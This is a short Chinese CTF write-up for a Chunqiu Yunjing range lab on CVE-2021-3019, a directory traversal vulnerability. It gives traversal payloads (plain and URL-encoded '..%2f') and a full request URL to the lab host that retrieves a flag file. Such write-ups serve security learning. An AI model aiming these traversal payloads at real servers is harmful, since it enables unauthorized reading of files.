春秋云境CVE-2021-3019

Chockmans2026-05-04 8:25

1.阅读靶场介绍

这里博主捕获到的关键字眼是

目录遍历漏洞

2.启动靶场

如下图所示

3.poc

这里就是构造目录遍历路径

../../../../../../../或者..%2f..%2f..%2f..%2f..%2f

这里博主构造完下面的路径弹出一个文件下载

http://39.106.48.123:39628/..%2f..%2f..%2f..%2f..%2fflag

各位可以参考参考

相关推荐
AI帮小忙1 天前
主机安全排查
linux·服务器·安全
AI人工智能+电脑小能手1 天前
【大白话说Java面试题 第102题】【并发篇】第2题:volatile 能否保证线程安全?
java·安全·面试
laoli_coding1 天前
数据机密性保护算法汇总(国际算法)
安全·网络安全·密码学
Lyyaoo.1 天前
【数据结构】HashMap底层存储+扩容机制+线程安全【待更新】
数据结构·安全·哈希算法
国冶机电安装1 天前
分包工程施工方案
安全
terry6001 天前
从流畅交互到高可用:企讯通Qcaptcha滑动拼图的毫秒级响应与容灾设计
web安全·json·asp.net·信息与通信·数据库架构
X7x51 天前
零信任架构:重塑数字时代安全边界的战略转型
网络安全·网络攻击模型·安全威胁分析·安全架构·零信任架构
无忧智库1 天前
某矿山井下人员精准定位与AI行为安全识别管控系统建设方案(WORD)
人工智能·安全
xiaofj1001 天前
reglock工作机制
大数据·安全
元宝骑士1 天前
SpringBoot + Sa-Token 实现 CSRF 令牌校验(进阶篇)
后端·安全
热门推荐
01《置身钉内》原文-可播放阅读02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08AI科技热点日报 | 2026年6月1日09CC-Switch 下载、安装与使用配置指南【2026.5.29】10CC-Switch & Claude 基于 Linux 服务器安装使用指南